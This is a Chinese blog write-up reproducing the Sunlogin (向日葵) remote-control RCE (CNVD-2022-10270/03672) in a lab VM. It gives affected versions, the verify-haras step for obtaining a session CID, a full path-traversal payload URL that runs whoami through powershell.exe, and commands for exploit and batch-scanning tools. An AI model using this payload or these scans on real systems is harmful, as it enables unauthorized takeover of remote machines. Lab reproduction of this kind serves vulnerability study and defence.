向日葵RCE复现
2024-10-21 12:57:32
CNVD-2022-10270/CNVD-2022-03672 向日葵RCE复现
前言
向日葵是一款免费的集远程控制电脑手机、远程桌面连接、远程开机、远程管理、支持内网穿透的一体化远程控制管理工具软件。
于2022年2月5日和2022年2月15日,CNVD公开上海贝锐信息科技股份有限公司的向日葵远控软件存在远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672),影响Windows系统使用的个人版和简约版,攻击者可利用该漏洞获取服务器控制权。
影响版本
向日葵个人版 for Windows <= 11.0.0.33
向日葵简约版 <= V1.0.1.43315(2021.12)
漏洞级别
高危
环境搭建
在虚拟机里安装11.0.0.33的低版本向日葵
漏洞复现
使用nmap或其他工具探测目标端口
在浏览器中访问ip+端口号+cgi-bin/rpc?action=verify-haras (端口号:每一个都尝试,直到获取到session值CID)
Cookies添加拿到的CID后加上payload请求
http://192.168.52.133:49437/check?cmd=ping../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe+ whoami
手动复现完成
工具使用
使用工具自带的扫描
xrkRce.exe -h ip -t scan
测试命令执行
批量检测
python3 sunlogin-fuzz.py -t 192.168.52.128/25
相关工具文件,安装包私信公众号向日葵获取
最新文章
- postfix启动失败
- springmvc(4)注解简单了解
- java 重载、重写、构造函数详解
- 互联网分享知识(一转载 http://www.cnblogs.com/baochuan/p/4636103.html)
- font拓展字体
- Objective-C Runtime之着魔的UIAlertView
- head,tail,cat,more,less
- UIScrollView 与 UIPageView 的联合使用
- sublime快捷方式和node.js
- jQuery源码学习(1):整体架构
- C++回顾day03---<输入输出流>
- oo第四次博客总结
- springboot整合视图层之Thymeleaf
- 关于 Java 中关于 数组的声明
- vue keep-alive解决关闭标签动态缓存问题
- Android 性能优化 SparseArray【转载】
- Exception in thread "main" java.lang.UnsatisfiedLinkError: org.apache.hadoop.io .nativeio.NativeIO$Windows.createDirectoryWithMode0(Ljava/lang/String;I)V
- TiDB 源码阅读系列文章(一)序
- python之 序列与字典遍历
- SpringMVC 使用 RESTful 架构实现 CRUD 操作